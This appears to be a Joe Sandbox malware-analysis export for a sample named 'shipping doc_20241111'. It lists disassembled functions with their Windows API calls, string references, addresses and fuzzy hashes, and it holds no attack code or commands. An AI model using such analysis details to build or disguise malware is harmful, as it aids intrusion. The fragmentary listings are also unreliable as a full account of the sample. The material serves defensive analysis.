Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID: LoadString$_wcslen
String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
API String ID: 4099089115-3080491070
Opcode ID: 809d8286918fd4b654051dc6482b8cf82243fbd50459d003e0b6a09241dfa4c0
Instruction ID: 7005c0067aa6467b41ba6f3be765cf6742226b367c70eccb0add88571bf44c4e
Opcode Fuzzy Hash: 809d8286918fd4b654051dc6482b8cf82243fbd50459d003e0b6a09241dfa4c0
Instruction Fuzzy Hash: 3851AE72900209ABDB15EBE1CD42EEEBB79AF14700F104065F90572092EB796F58EF61

Function 00FAB4E6 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 142COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 00FAB51A
_wcslen.LIBCMT ref: 00FAB526
_wcslen.LIBCMT ref: 00FAB56B
_wcslen.LIBCMT ref: 00FAB5AA
_wcslen.LIBCMT ref: 00FAB5E5

Strings

APPEND, xrefs: 00FAB5DF, 00FAB5E4
KEYS, xrefs: 00FAB565, 00FAB56A
REMOVE, xrefs: 00FAB520, 00FAB525
EXISTS, xrefs: 00FAB5A4, 00FAB5A9

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID: _wcslen$BuffCharUpper
String ID: APPEND$EXISTS$KEYS$REMOVE
API String ID: 1256254125-769500911
Opcode ID: b88b4d0bfefdf9004b5b90bb3a679747234159a058990fcbc2f5332dba7e972a
Instruction ID: ef172d4ab51709dc8b8f4dd7fb834ef426c84aea23b6b83751bcb8d3c417b682
Opcode Fuzzy Hash: b88b4d0bfefdf9004b5b90bb3a679747234159a058990fcbc2f5332dba7e972a
Instruction Fuzzy Hash: FA41F7B2E001278ECB105F7DCC905BE77A5BF627A4B284229E465D7285FB35CD81E790

Function 00FB52B1 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 103COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 00FB52BE
GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 00FB5334
GetLastError.KERNEL32 ref: 00FB533E
SetErrorMode.KERNEL32(00000000,READY), ref: 00FB53C5

Strings

READY, xrefs: 00FB537E, 00FB5386
READONLY, xrefs: 00FB5370
INVALID, xrefs: 00FB5377
NOTREADY, xrefs: 00FB5369
UNKNOWN, xrefs: 00FB5362

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID: Error$Mode$DiskFreeLastSpace
String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
API String ID: 4194297153-14809454
Opcode ID: 18b7a0ba07a4a1638cc7a9b92eb6f68a4ae4881251eb997d8125a1fe5b44358f
Instruction ID: 078ca42510be8bda158c0b8231a3838847afb2a06b7e0ddaa2a1317bb4ee1de4
Opcode Fuzzy Hash: 18b7a0ba07a4a1638cc7a9b92eb6f68a4ae4881251eb997d8125a1fe5b44358f
Instruction Fuzzy Hash: 0F319A35E002059FD711DF69C884BAABBF6AB05754F18805AE405CB392C7B9DD42EB90

Function 00FD3B79 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 101windowCOMMON

Download Yara Rule

APIs

CreateMenu.USER32 ref: 00FD3BAC
SetMenu.USER32(?,00000000), ref: 00FD3BBB
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00FD3C43
IsMenu.USER32(?), ref: 00FD3C57
CreatePopupMenu.USER32 ref: 00FD3C61
InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00FD3C8E
DrawMenuBar.USER32 ref: 00FD3C96

Strings

F, xrefs: 00FD3C81
0, xrefs: 00FD3B87

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID: Menu$CreateItem$DrawInfoInsertPopup
String ID: 0$F
API String ID: 161812096-3044882817
Opcode ID: fbc916654339797d1a709a74f65163677ca37dc63bfa21184e182646c30d2cf9
Instruction ID: 2dbd63cd8520710107a9e030b4a8a9cd25bc1c885f31fd4d0500cdcbc242a140
Opcode Fuzzy Hash: fbc916654339797d1a709a74f65163677ca37dc63bfa21184e182646c30d2cf9
Instruction Fuzzy Hash: 62415E75A1120AAFDB14CF64E944F9A7BF6FF49310F18002AFA45A7350D735AA10EF51

Function 00FD3956 Relevance: 15.2, APIs: 10, Instructions: 182windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00FD39D0
SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00FD39D3
GetWindowLongW.USER32(?,000000F0), ref: 00FD39FA
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00FD3A1D
SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00FD3A95
SendMessageW.USER32(?,00001074,00000000,00000007), ref: 00FD3ADF
SendMessageW.USER32(?,00001057,00000000,00000000), ref: 00FD3AFA
SendMessageW.USER32(?,0000101D,00001004,00000000), ref: 00FD3B15
SendMessageW.USER32(?,0000101E,00001004,00000000), ref: 00FD3B29
SendMessageW.USER32(?,00001008,00000000,00000007), ref: 00FD3B46

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID: MessageSend$LongWindow
String ID:
API String ID: 312131281-0
Opcode ID: 9f624a0d9abe7d2a2e724ca8e47a5a4047dc10c2c3127e949ff54b6a40ad7841
Instruction ID: eba31b6b092f15d87cdcb04ab373ccb9b4d9208b3affec28cb6a462d88985652
Opcode Fuzzy Hash: 9f624a0d9abe7d2a2e724ca8e47a5a4047dc10c2c3127e949ff54b6a40ad7841
Instruction Fuzzy Hash: D4618B75A00208AFDB20DFA8CC81EEE77B9EF49710F14015AFA54E7391D775AA41EB50

Function 00FAB04D Relevance: 15.1, APIs: 10, Instructions: 88threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00FAB06F
GetForegroundWindow.USER32(00000000,?,?,?,?,?,00FAA0FF,?,00000001), ref: 00FAB083
GetWindowThreadProcessId.USER32(00000000), ref: 00FAB08A
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00FAA0FF,?,00000001), ref: 00FAB099
GetWindowThreadProcessId.USER32(?,00000000), ref: 00FAB0AB
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00FAA0FF,?,00000001), ref: 00FAB0C4
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00FAA0FF,?,00000001), ref: 00FAB0D6
AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00FAA0FF,?,00000001), ref: 00FAB11B
AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00FAA0FF,?,00000001), ref: 00FAB130
AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00FAA0FF,?,00000001), ref: 00FAB13B

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID: Thread$AttachInput$Window$Process$CurrentForeground
String ID:
API String ID: 2156557900-0
Opcode ID: b596228743668d29c93588d8ea2709ea0abcd61d143f278e647797274001ad58
Instruction ID: aae9d58a5128e4c4372fcaffa7b89007fa986fe3c781f7a991bb35259e1ce082
Opcode Fuzzy Hash: b596228743668d29c93588d8ea2709ea0abcd61d143f278e647797274001ad58
Instruction Fuzzy Hash: 1A31D2B2900205BFDB249F24DD64F6A77A9EB06361F20801DF945C6185D7B9DC40EBA0

Function 00F72C10 Relevance: 15.1, APIs: 10, Instructions: 54COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00F72C24

Part of subcall function 00F72958: RtlFreeHeap.NTDLL(00000000,00000000,?,00F7D771,00000000,00000000,00000000,00000000,?,00F7D798,00000000,00000007,00000000,?,00F7DB95,00000000), ref: 00F7296E
Part of subcall function 00F72958: GetLastError.KERNEL32(00000000,?,00F7D771,00000000,00000000,00000000,00000000,?,00F7D798,00000000,00000007,00000000,?,00F7DB95,00000000,00000000), ref: 00F72980

_free.LIBCMT ref: 00F72C30
_free.LIBCMT ref: 00F72C3B
_free.LIBCMT ref: 00F72C46
_free.LIBCMT ref: 00F72C51
_free.LIBCMT ref: 00F72C5C
_free.LIBCMT ref: 00F72C67
_free.LIBCMT ref: 00F72C72
_free.LIBCMT ref: 00F72C7D
_free.LIBCMT ref: 00F72C8B

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 3aed308a9ba7b23e96b9988babbcd3e7d6b3ae08c5becbd7ca2c47a516b7c998
Instruction ID: 8083ebd545e767cc4dc92204fab0724ce7755dd7812992764c95d9a0349d1ea7
Opcode Fuzzy Hash: 3aed308a9ba7b23e96b9988babbcd3e7d6b3ae08c5becbd7ca2c47a516b7c998
Instruction Fuzzy Hash: F7110776200049BFCB41EF55CC42CDC7BB5FF05350F4480A6BA5C5B262DA35DA91BB41

Function 00F42D1B Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 332comCOMMON

Download Yara Rule

APIs

mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00F42D64
OleUninitialize.OLE32(?,00000000), ref: 00F42E03
UnregisterHotKey.USER32(?), ref: 00F42FE8
DestroyWindow.USER32(?), ref: 00F83045
FreeLibrary.KERNEL32(?), ref: 00F830AA
VirtualFree.KERNEL32(?,00000000,00008000), ref: 00F830D7

Strings

close all, xrefs: 00F42D5F

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
String ID: close all
API String ID: 469580280-3243417748
Opcode ID: 62b33913c34f9e5a9c70cb93a85caa3b0aebaa777e9c25fb3fe32edeaa28fff5
Instruction ID: 739910426fa6b25e91f1ea3e9375b48281cb980ba097b239085efc596f1023ae
Opcode Fuzzy Hash: 62b33913c34f9e5a9c70cb93a85caa3b0aebaa777e9c25fb3fe32edeaa28fff5
Instruction Fuzzy Hash: DDD19331B01212CFCB15EF15C899B69FBB4BF05B10F5442ADE90A67262DB31AD16EF81

Function 00F4758A Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 184windowCOMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(?,000000EB), ref: 00F4761A

Part of subcall function 00F476AA: GetClientRect.USER32(?,?), ref: 00F476D0
Part of subcall function 00F476AA: GetWindowRect.USER32(?,?), ref: 00F47711
Part of subcall function 00F476AA: ScreenToClient.USER32(?,?), ref: 00F47739

GetDC.USER32 ref: 00F852A2
SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00F852B5
SelectObject.GDI32(00000000,00000000), ref: 00F852C3
SelectObject.GDI32(00000000,00000000), ref: 00F852D8
ReleaseDC.USER32(?,00000000), ref: 00F852E0
MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 00F85371

Strings

U, xrefs: 00F85240

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
String ID: U
API String ID: 4009187628-3372436214
Opcode ID: 5f87a530993e78645137b584b0beb8f9506af9fa15e9cc22662fb972ae2c7506
Instruction ID: 1bc199d010d41e974748406c99f2492bba74b3ded7ae842031af5bbf75af08d2
Opcode Fuzzy Hash: 5f87a530993e78645137b584b0beb8f9506af9fa15e9cc22662fb972ae2c7506
Instruction Fuzzy Hash: C971F131804709DFCF22AF64C884AFA7BB6FF09760F18466AED555A2A6C7358840FF50

Function 00FA4419 Relevance: 14.2, APIs: 4, Strings: 4, Instructions: 160COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00FA4296
_wcslen.LIBCMT ref: 00FA42F0
_wcslen.LIBCMT ref: 00FA4337

Strings

REGEXPTITLE, xrefs: 00FA4375, 00FA437A
ACTIVE, xrefs: 00FA42EB, 00FA42FC
HANDLE, xrefs: 00FA4331, 00FA4336
LAST, xrefs: 00FA4291, 00FA42B2

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID: _wcslen
String ID: ACTIVE$HANDLE$LAST$REGEXPTITLE
API String ID: 176396367-1994484594
Opcode ID: 2a0ebfac4545a8ae6542ab7d2e9495358a78c3547ca111ac298f261f465e74b4
Instruction ID: 1ba6ba1e3232bf054cb170ab97ea505671a65cc6e5f00844b109856c103b07d6
Opcode Fuzzy Hash: 2a0ebfac4545a8ae6542ab7d2e9495358a78c3547ca111ac298f261f465e74b4
Instruction Fuzzy Hash: 1A51F5B2F043128BCB14CE79C98057A77E1BBDA724B50062DE981D7584EBA0FD49F7A1

Function 00FA469F Relevance: 14.2, APIs: 4, Strings: 4, Instructions: 158COMMON

Download Yara Rule

APIs

Part of subcall function 00FA3F58: CharUpperBuffW.USER32(?,?,00000000,00FDD0D0,?,?,00000001,?,?,00FA4286,?,?,?,?,00000000,00FDD0D0), ref: 00FA3FE5

_wcslen.LIBCMT ref: 00FA4296
_wcslen.LIBCMT ref: 00FA42F0
_wcslen.LIBCMT ref: 00FA4337
_wcslen.LIBCMT ref: 00FA437B

Strings

REGEXPTITLE, xrefs: 00FA4375, 00FA437A
ACTIVE, xrefs: 00FA42EB, 00FA42FC
HANDLE, xrefs: 00FA4331, 00FA4336
LAST, xrefs: 00FA4291, 00FA42B2

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID: _wcslen$BuffCharUpper
String ID: ACTIVE$HANDLE$LAST$REGEXPTITLE
API String ID: 1256254125-1994484594
Opcode ID: cf4566fe019cc13b7a634511760217036ca4ffe150ee8581d238c03649bee9a9
Instruction ID: 17e581c5c40d23b6cd1310a98e56fee57543844f7fdc200afeca0aab013e2ba5
Opcode Fuzzy Hash: cf4566fe019cc13b7a634511760217036ca4ffe150ee8581d238c03649bee9a9
Instruction Fuzzy Hash: F541E3B2F143118B8B14DE69C89097B77E1BFD6720B60062DE88197581EBA0FD05F791

Function 00FA448E Relevance: 14.2, APIs: 4, Strings: 4, Instructions: 155COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00FA4296
_wcslen.LIBCMT ref: 00FA42F0
_wcslen.LIBCMT ref: 00FA4337

Strings

REGEXPTITLE, xrefs: 00FA4375, 00FA437A
ACTIVE, xrefs: 00FA42EB, 00FA42FC
HANDLE, xrefs: 00FA4331, 00FA4336
LAST, xrefs: 00FA4291, 00FA42B2

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID: _wcslen
String ID: ACTIVE$HANDLE$LAST$REGEXPTITLE
API String ID: 176396367-1994484594
Opcode ID: 9eaf9ac238f35bce67529287223da4f8ed7fd9dbb9bef69a87cfa51016e5b136
Instruction ID: 23eb73dcc2aa60398281e18fc1f2492b9eff0b2924a8ba8e080da0df0d6155d6
Opcode Fuzzy Hash: 9eaf9ac238f35bce67529287223da4f8ed7fd9dbb9bef69a87cfa51016e5b136
Instruction Fuzzy Hash: 9B4105B2F143224B8B24CE79C98053A77D1BBD6734B60062DE88197584EBA0FD05B7A0

Function 00FA4671 Relevance: 14.2, APIs: 4, Strings: 4, Instructions: 152COMMON

Download Yara Rule

APIs

Part of subcall function 00F43536: _wcslen.LIBCMT ref: 00F43541

Part of subcall function 00FA3F58: CharUpperBuffW.USER32(?,?,00000000,00FDD0D0,?,?,00000001,?,?,00FA4286,?,?,?,?,00000000,00FDD0D0), ref: 00FA3FE5

_wcslen.LIBCMT ref: 00FA4296
_wcslen.LIBCMT ref: 00FA42F0
_wcslen.LIBCMT ref: 00FA4337
_wcslen.LIBCMT ref: 00FA437B

Strings

REGEXPTITLE, xrefs: 00FA4375, 00FA437A
ACTIVE, xrefs: 00FA42EB, 00FA42FC
HANDLE, xrefs: 00FA4331, 00FA4336
LAST, xrefs: 00FA4291, 00FA42B2

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID: _wcslen$BuffCharUpper
String ID: ACTIVE$HANDLE$LAST$REGEXPTITLE
API String ID: 1256254125-1994484594
Opcode ID: 7219abca2dede5b0a32be2a464d26e8747bfa6427f8203a3fcb6178fc515b0c1
Instruction ID: 4c688dc122716ac6b462df63d98600d1d546c926f969d1b6c29cfe0d0953f8d8
Opcode Fuzzy Hash: 7219abca2dede5b0a32be2a464d26e8747bfa6427f8203a3fcb6178fc515b0c1
Instruction Fuzzy Hash: 974114B2F143128B8B14DE69C88053A77E1BFD7760B60062DE88197685FBA0FD05F791

Function 00FB34BA Relevance: 14.2, APIs: 3, Strings: 5, Instructions: 150COMMON

Download Yara Rule

APIs

LoadStringW.USER32(00000066,?,00000FFF,?), ref: 00FB3502

Part of subcall function 00F4B606: _wcslen.LIBCMT ref: 00F4B610

LoadStringW.USER32(?,?,00000FFF,?), ref: 00FB3528

Strings

Error: , xrefs: 00FB360D
"%s" (%d) : ==> %s:%s%s, xrefs: 00FB3642
Line %d (File "%s"):, xrefs: 00FB3589
"%s" (%d) : ==> %s:, xrefs: 00FB3660
^ ERROR, xrefs: 00FB35E7

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID: LoadString$_wcslen
String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
API String ID: 4099089115-2391861430
Opcode ID: 44d79f359740d70577484b582661373d4612276dba9553bc8f44c70dcab9807c
Instruction ID: 41f7526b3515050422d9959e06ac705580ebce2e0d7c03f7ea29d1b3b6d987e2
Opcode Fuzzy Hash: 44d79f359740d70577484b582661373d4612276dba9553bc8f44c70dcab9807c
Instruction Fuzzy Hash: B2515D7284020AABDF15EFE1CC82EEEBB35AF14700F044166F90572192EB795B99EF50

Function 00FA46DC Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 148COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00FA4296
_wcslen.LIBCMT ref: 00FA42F0
_wcslen.LIBCMT ref: 00FA4337
_wcslen.LIBCMT ref: 00FA437B

Strings

REGEXPTITLE, xrefs: 00FA4375, 00FA437A
ACTIVE, xrefs: 00FA42EB, 00FA42FC
HANDLE, xrefs: 00FA4331, 00FA4336
LAST, xrefs: 00FA4291, 00FA42B2

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID: _wcslen
String ID: ACTIVE$HANDLE$LAST$REGEXPTITLE
API String ID: 176396367-1994484594
Opcode ID: b2c2e2b1b27f216ba813c2d4e5fd29bdfaab23ba987c009e9e92c50ffa562267
Instruction ID: cbbd20c04d0d1ae93938c19712b39719bc1361b05cf0938533fb887484bbb8b3
Opcode Fuzzy Hash: b2c2e2b1b27f216ba813c2d4e5fd29bdfaab23ba987c009e9e92c50ffa562267
Instruction Fuzzy Hash: 4741F3B2F043224A8B24CE79C98053B77E1BFD7764B50052DE88197684EBA0FD05F761

Function 00FD8CBB Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 145windowCOMMON

Download Yara Rule

APIs

DefDlgProcW.USER32(?,00000111,?,?,?,?,?), ref: 00FD8D0F

Part of subcall function 00FD7D90: IsWindow.USER32(01245620), ref: 00FD7E29
Part of subcall function 00FD7D90: IsWindowEnabled.USER32(01245620), ref: 00FD7E35

GetMenuItemInfoW.USER32(?,?,?,?), ref: 00FD8DC1
GetMenuItemCount.USER32(?), ref: 00FD8DDE
GetMenuItemID.USER32(?), ref: 00FD8DEE
GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 00FD8E20
GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 00FD8E62
CheckMenuRadioItem.USER32(?,?,?,?,00000400), ref: 00FD8E93

Strings

0, xrefs: 00FD8D91

